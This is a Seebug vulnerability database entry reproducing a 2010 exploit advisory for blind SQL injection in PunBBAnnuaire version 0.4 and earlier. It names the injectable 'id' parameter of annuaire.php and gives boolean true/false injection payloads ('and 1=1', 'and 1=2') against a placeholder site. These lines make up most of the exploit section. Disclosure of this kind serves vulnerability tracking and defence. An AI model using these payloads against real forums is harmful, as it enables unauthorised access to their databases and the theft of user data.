Lucene search

K
seebugRootSSV:19135
HistoryFeb 19, 2010 - 12:00 a.m.

PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability

2010-02-1900:00:00
Root
www.seebug.org
6
punbbannuaire
blind sql injection
exploit
annuaire.php

No description provided by source.


                                                PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability
========================================================
 
####################################################################
.:. Author : Metropolis
.:. Home : http://xrayoptics.by.ru/
.:. Script : PunBBAnnuaire
.:. Version : 0.4
.:. Download Script: http://www.punres.org/download.php?id=1737
.:. Bug Type : Blind Sql Injection
 
####################################################################
 
===[ Exploit ]===
 
/annuaire.php?action=site&id=1[ Blind SQL INJECTION ]
 
 
www.site.com/forum/annuaire.php?action=site&id=1 and 1=1 <-- true
 
www.site.com/forum/annuaire.php?action=site&id=1 and 1=2 <-- false
 
 
 
####################################################################
 
Vive la France !